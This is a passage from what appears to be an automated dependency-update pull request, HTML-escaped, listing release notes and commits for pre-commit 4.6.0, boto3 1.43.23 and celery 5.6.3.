2026-04-21\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: allow \u003ccode\u003e--hook-dir\u003c/code\u003e to be missing to enable easier\nusage with \u003ccode\u003egit\u003c/code\u003e 2.54+ git hooks.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epre-commit hook-impl\u003c/code\u003e: \u003ccode\u003e--hook-type\u003c/code\u003e is required.\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e PR by \u003ca href=\"https://github.com/asottile\"\u003e\u003ccode\u003e@​asottile\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f35134b05028ec938ac605ae500fdf95462655d3\"\u003e\u003ccode\u003ef35134b\u003c/code\u003e\u003c/a\u003e v4.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2a51ffcb81f6c8ed2e6467913c3343a8800f3ab9\"\u003e\u003ccode\u003e2a51ffc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3662\"\u003e#3662\u003c/a\u003e from pre-commit/hook-impl-optional-hook-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/d7dee322abfc765b042f2e3b872aab3c3a867610\"\u003e\u003ccode\u003ed7dee32\u003c/code\u003e\u003c/a\u003e make --hook-dir optional for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/965aeb1c680e8b526342153547f0ec014484c63d\"\u003e\u003ccode\u003e965aeb1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3661\"\u003e#3661\u003c/a\u003e from pre-commit/hook-impl-required\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/2eacc064aa9b5bb33d3a0d84a234b475e34f3096\"\u003e\u003ccode\u003e2eacc06\u003c/code\u003e\u003c/a\u003e --hook-type is required for hook-impl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/f5678bf4ac35cffc0ff7174ad85f7fdc2a5c977e\"\u003e\u003ccode\u003ef5678bf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3657\"\u003e#3657\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/054cc5bd6bb1b20faa1eefe09f0de3b68fceee94\"\u003e\u003ccode\u003e054cc5b\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/5c0f3024d2524f6e029a4c333392fd9be9fb27f6\"\u003e\u003ccode\u003e5c0f302\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3652\"\u003e#3652\u003c/a\u003e from pre-commit/pre-commit-ci-update-config\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/a5d91142676630f8130020b35e166e0c0e92b8f4\"\u003e\u003ccode\u003ea5d9114\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pre-commit/pre-commit/commit/129a1f5ca1eaee0c952a5e7a07faae305c5e15bc\"\u003e\u003ccode\u003e129a1f5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pre-commit/pre-commit/issues/3641\"\u003e#3641\u003c/a\u003e from pre-commit/mxr-patch-1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pre-commit/pre-commit/compare/v4.5.1...v4.6.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `boto3` from 1.42.68 to 1.43.23\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/f2106e0d34cb87a89f066f06373d337da503b0d5\"\u003e\u003ccode\u003ef2106e0\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.23'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/d7e5b7c20dfad5465df92d55541638ecfc09e981\"\u003e\u003ccode\u003ed7e5b7c\u003c/code\u003e\u003c/a\u003e Bumping version to 1.43.23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/86efe86a74067974ef06571cb101697a8afd66a5\"\u003e\u003ccode\u003e86efe86\u003c/code\u003e\u003c/a\u003e Add changelog entries from botocore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/83844402cce909b1ceded705ceb69cdcefec445b\"\u003e\u003ccode\u003e8384440\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.22'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/eea01a7257d0278255c8c20d7d303ca779135c3c\"\u003e\u003ccode\u003eeea01a7\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.22' into develop\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/eff8ee7efd00440fa4a9feb37371c35430cebe06\"\u003e\u003ccode\u003eeff8ee7\u003c/code\u003e\u003c/a\u003e Bumping version to 1.43.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/880860d297137acb995926f4f11e9b888b6d9755\"\u003e\u003ccode\u003e880860d\u003c/code\u003e\u003c/a\u003e Add changelog entries from botocore\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/400e1f677f6e912a2b32ce0e6409f66d5385777f\"\u003e\u003ccode\u003e400e1f6\u003c/code\u003e\u003c/a\u003e Add reference to post-quantum cryptography in security docs page (\u003ca href=\"https://redirect.github.com/boto/boto3/issues/4793\"\u003e#4793\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/0df64b349cac1df15349f91b00fd867ff97e7d68\"\u003e\u003ccode\u003e0df64b3\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.21'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/boto/boto3/commit/d3d327fc4bdeb0bc8ab38d5ddbdd49d6af247dbf\"\u003e\u003ccode\u003ed3d327f\u003c/code\u003e\u003c/a\u003e Merge branch 'release-1.43.21' into develop\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/boto/boto3/compare/1.42.68...1.43.23\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 5.6.2 to 5.6.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.6.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Django worker recursion bug + defensive checks for pool_cls.\u003cstrong\u003emodule\u003c/strong\u003e by \u003ca href=\"https://github.com/maycuatroi1\"\u003e\u003ccode\u003e@​maycuatroi1\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10048\"\u003ecelery/celery#10048\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Update user_preload_options example to use click. by \u003ca href=\"https://github.com/jorsyk\"\u003e\u003ccode\u003e@​jorsyk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10056\"\u003ecelery/celery#10056\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix invalid configuration key \u0026quot;bootstrap_servers\u0026quot; in Kafka demo by \u003ca href=\"https://github.com/jorsyk\"\u003e\u003ccode\u003e@​jorsyk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10060\"\u003ecelery/celery#10060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix broken images on PyPI page by \u003ca href=\"https://github.com/Timour-Ilyas\"\u003e\u003ccode\u003e@​Timour-Ilyas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10066\"\u003ecelery/celery#10066\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove broken reference. by \u003ca href=\"https://github.com/sueannioanis\"\u003e\u003ccode\u003e@​sueannioanis\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10071\"\u003ecelery/celery#10071\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved --dist=loadscope from smoke tests by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10073\"\u003ecelery/celery#10073\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Clarify task_retry signal args may be None by \u003ca href=\"https://github.com/GangEunzzang\"\u003e\u003ccode\u003e@​GangEunzzang\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10076\"\u003ecelery/celery#10076\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate example for Django by \u003ca href=\"https://github.com/sbc-khacnha\"\u003e\u003ccode\u003e@​sbc-khacnha\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10081\"\u003ecelery/celery#10081\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake tests compatible with pymongo \u0026gt;= 4.16 by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10074\"\u003ecelery/celery#10074\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: source install of cassandra-driver by \u003ca href=\"https://github.com/Izzette\"\u003e\u003ccode\u003e@​Izzette\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10105\"\u003ecelery/celery#10105\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: register task cross-reference role in Sphinx extension by \u003ca href=\"https://github.com/veeceey\"\u003e\u003ccode\u003e@​veeceey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10100\"\u003ecelery/celery#10100\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: avoid cycle detection in native delayed delivery by \u003ca href=\"https://github.com/Izzette\"\u003e\u003ccode\u003e@​Izzette\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10095\"\u003ecelery/celery#10095\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(asynpool): avoid AttributeError when proc lacks _sentinel_poll by \u003ca href=\"https://github.com/mriddle\"\u003e\u003ccode\u003e@​mriddle\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10086\"\u003ecelery/celery#10086\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix dusk_astronomical horizon sign (+18 -\u0026gt; -18) by \u003ca href=\"https://github.com/Mr-Neutr0n\"\u003e\u003ccode\u003e@​Mr-Neutr0n\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10121\"\u003ecelery/celery#10121\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix/10106 onupdate col use lambda func by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10108\"\u003ecelery/celery#10108\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix warm shutdown RuntimeError with eventlet\u0026gt;=0.37.0 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/10083\"\u003e#10083\u003c/a\u003e) by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10123\"\u003ecelery/celery#10123\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix 10109 db backend connection health by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10124\"\u003ecelery/celery#10124\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDatabase Backend filter unsupport sql engine arguments with nullpool \u003ca href=\"https://redirect.github.com/celery/celery/issues/7355\"\u003e#7355\u003c/a\u003e by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10134\"\u003ecelery/celery#10134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(beat): correct argument order in Service.\u003cstrong\u003ereduce\u003c/strong\u003e by \u003ca href=\"https://github.com/bysiber\"\u003e\u003ccode\u003e@​bysiber\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10137\"\u003ecelery/celery#10137\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: declare explicit read-only token permissions in workflow jobs by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10139\"\u003ecelery/celery#10139\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: 'boto3to' to 'boto3 to' by \u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10133\"\u003ecelery/celery#10133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDatabase Backend: Add missing index on date_done (Fixes \u003ca href=\"https://redirect.github.com/celery/celery/issues/10097\"\u003e#10097\u003c/a\u003e) by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10098\"\u003ecelery/celery#10098\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix typo in CONTRIBUTING.rst by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10141\"\u003ecelery/celery#10141\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRefer to Flower / Prometheus for monitoring by \u003ca href=\"https://github.com/WilliamDEdwards\"\u003e\u003ccode\u003e@​WilliamDEdwards\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10140\"\u003ecelery/celery#10140\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: remove duplicated words in broker and routing docs by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10146\"\u003ecelery/celery#10146\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix stale version reference and grammar in README by \u003ca href=\"https://github.com/kelsonbrito50\"\u003e\u003ccode\u003e@​kelsonbrito50\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10145\"\u003ecelery/celery#10145\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix wording in Celery 5.3 worker pool notes by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10149\"\u003ecelery/celery#10149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix duplicated wording in 3.1 changelog entry by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10152\"\u003ecelery/celery#10152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix changelog typo in context manager wording by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10144\"\u003ecelery/celery#10144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix/10096 worker fails to reconnect after redis failover by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10151\"\u003ecelery/celery#10151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove on_after_finalize signal documentation by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10155\"\u003ecelery/celery#10155\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd non-commutative example to clarify partial arg ordering in canvas docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10157\"\u003ecelery/celery#10157\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove redundant test_isa_mapping test (fixes \u003ca href=\"https://redirect.github.com/celery/celery/issues/10077\"\u003e#10077\u003c/a\u003e) by \u003ca href=\"https://github.com/daniel7an\"\u003e\u003ccode\u003e@​daniel7an\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10103\"\u003ecelery/celery#10103\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade pytest-celery to \u0026gt;=1.3.0 and adopt PYTEST_CELERY_PKG build arg by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10162\"\u003ecelery/celery#10162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove deprecated args from redis get_connection call by \u003ca href=\"https://github.com/JaeHyuckSa\"\u003e\u003ccode\u003e@​JaeHyuckSa\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10036\"\u003ecelery/celery#10036\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/celery/celery/issues/6912\"\u003e#6912\u003c/a\u003e rpc backend reconnection error by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10179\"\u003ecelery/celery#10179\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix NameError with TYPE_CHECKING annotations on Python 3.14+ (PEP 649) by \u003ca href=\"https://github.com/drichardson\"\u003e\u003ccode\u003e@​drichardson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10165\"\u003ecelery/celery#10165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Add elaboration on prefetch multiplier settings (worker_prefetch_multiplier) and worker_eta_task_limit by \u003ca href=\"https://github.com/tsangwailam\"\u003e\u003ccode\u003e@​tsangwailam\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10181\"\u003ecelery/celery#10181\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix O(K²) message bloat in a chain of chords by \u003ca href=\"https://github.com/Borzik\"\u003e\u003ccode\u003e@​Borzik\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10171\"\u003ecelery/celery#10171\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mock connection interfaces to prevent \u003ccode\u003eTypeError\u003c/code\u003e during exception handling by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10178\"\u003ecelery/celery#10178\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(trace): dispatch chain/callbacks on dedup fast-path for redelivered tasks by \u003ca href=\"https://github.com/aurangzaib048\"\u003e\u003ccode\u003e@​aurangzaib048\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10159\"\u003ecelery/celery#10159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eExtract \u003ccode\u003ereconnect_on_error\u003c/code\u003e to \u003ccode\u003eBaseResultConsumer\u003c/code\u003e by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10189\"\u003ecelery/celery#10189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003epep 649 by \u003ca href=\"https://github.com/ericbuehl\"\u003e\u003ccode\u003e@​ericbuehl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10187\"\u003ecelery/celery#10187\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix#9722 friendly status errors for CLI by \u003ca href=\"https://github.com/ChickenBenny\"\u003e\u003ccode\u003e@​ChickenBenny\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10190\"\u003ecelery/celery#10190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: clarify after_return behavior for retried tasks by \u003ca href=\"https://github.com/KianAnbarestani\"\u003e\u003ccode\u003e@​KianAnbarestani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10192\"\u003ecelery/celery#10192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd compression header to message protocol docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10156\"\u003ecelery/celery#10156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: fix duplicated word in bootsteps comment by \u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10153\"\u003ecelery/celery#10153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove outdated autoreloader section from extending docs by \u003ca href=\"https://github.com/Br1an67\"\u003e\u003ccode\u003e@​Br1an67\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/10154\"\u003ecelery/celery#10154\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/v5.6.3/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.6.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2026-03-26\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Fix Django worker recursion bug + defensive checks for pool_cls.__module__ ([#10048](https://github.com/celery/celery/issues/10048))\n- Docs: Update user_preload_options example to use click. ([#10056](https://github.com/celery/celery/issues/10056))\n- Fix invalid configuration key \u0026quot;bootstrap_servers\u0026quot; in Kafka demo ([#10060](https://github.com/celery/celery/issues/10060))\n- Fix broken images on PyPI page ([#10066](https://github.com/celery/celery/issues/10066))\n- Remove broken reference. ([#10071](https://github.com/celery/celery/issues/10071))\n- Removed --dist=loadscope from smoke tests ([#10073](https://github.com/celery/celery/issues/10073))\n- Docs: Clarify task_retry signal args may be None ([#10076](https://github.com/celery/celery/issues/10076))\n- Update example for Django ([#10081](https://github.com/celery/celery/issues/10081))\n- Make tests compatible with pymongo \u0026gt;= 4.16 ([#10074](https://github.com/celery/celery/issues/10074))\n- fix: source install of cassandra-driver ([#10105](https://github.com/celery/celery/issues/10105))\n- fix: register task cross-reference role in Sphinx extension ([#10100](https://github.com/celery/celery/issues/10100))\n- fix: avoid cycle detection in native delayed delivery ([#10095](https://github.com/celery/celery/issues/10095))\n- fix(asynpool): avoid AttributeError when proc lacks _sentinel_poll ([#10086](https://github.com/celery/celery/issues/10086))\n- fix dusk_astronomical horizon sign (+18 -\u0026gt; -18) ([#10121](https://github.com/celery/celery/issues/10121))\n- Fix/10106 onupdate col use lambda func ([#10108](https://github.com/celery/celery/issues/10108))\n- Fix warm shutdown RuntimeError with eventlet\u0026gt;=0.37.0 ([#10083](https://github.com/celery/celery/issues/10083)) ([#10123](https://github.com/celery/celery/issues/10123))\n- Fix 10109 db backend connection health ([#10124](https://github.com/celery/celery/issues/10124))\n- Database Backend filter unsupport sql engine arguments with nullpool [#7355](https://github.com/celery/celery/issues/7355) ([#10134](https://github.com/celery/celery/issues/10134))\n- fix(beat): correct argument order in Service.__reduce__ ([#10137](https://github.com/celery/celery/issues/10137))\n- ci: declare explicit read-only token permissions in workflow jobs ([#10139](https://github.com/celery/celery/issues/10139))\n- chore: 'boto3to' to 'boto3 to' ([#10133](https://github.com/celery/celery/issues/10133))\n- Database Backend: Add missing index on date_done (Fixes [#10097](https://github.com/celery/celery/issues/10097)) ([#10098](https://github.com/celery/celery/issues/10098))\n- docs: fix typo in CONTRIBUTING.rst ([#10141](https://github.com/celery/celery/issues/10141))\n- Refer to Flower / Prometheus for monitoring ([#10140](https://github.com/celery/celery/issues/10140))\n- docs: remove duplicated words in broker and routing docs ([#10146](https://github.com/celery/celery/issues/10146))\n- docs: fix stale version reference and grammar in README ([#10145](https://github.com/celery/celery/issues/10145))\n- docs: fix wording in Celery 5.3 worker pool notes ([#10149](https://github.com/celery/celery/issues/10149))\n- docs: fix duplicated wording in 3.1 changelog entry ([#10152](https://github.com/celery/celery/issues/10152))\n- docs: fix changelog typo in context manager wording ([#10144](https://github.com/celery/celery/issues/10144))\n- Fix/10096 worker fails to reconnect after redis failover ([#10151](https://github.com/celery/celery/issues/10151))\n- Improve on_after_finalize signal documentation ([#10155](https://github.com/celery/celery/issues/10155))\n- Add non-commutative example to clarify partial arg ordering in canvas docs ([#10157](https://github.com/celery/celery/issues/10157))\n- Remove redundant test_isa_mapping test (fixes [#10077](https://github.com/celery/celery/issues/10077)) ([#10103](https://github.com/celery/celery/issues/10103))\n- Upgrade pytest-celery to \u0026gt;=1.3.0 and adopt PYTEST_CELERY_PKG build arg ([#10162](https://github.com/celery/celery/issues/10162))\n- Remove deprecated args from redis get_connection call ([#10036](https://github.com/celery/celery/issues/10036))\n- Fix [#6912](https://github.com/celery/celery/issues/6912) rpc backend reconnection error ([#10179](https://github.com/celery/celery/issues/10179))\n- Fix NameError with TYPE_CHECKING annotations on Python 3.14+ (PEP 649) ([#10165](https://github.com/celery/celery/issues/10165))\n- docs: Add elaboration on prefetch multiplier settings (worker_prefetch_multiplier) and worker_eta_task_limit ([#10181](https://github.com/celery/celery/issues/10181))\n- Fix O(K²) message bloat in a chain of chords ([#10171](https://github.com/celery/celery/issues/10171))\n- Fix mock connection interfaces to prevent `TypeError` during exception handling ([#10178](https://github.com/celery/celery/issues/10178))\n- fix(trace): dispatch chain/callbacks on dedup fast-path for redelivered tasks 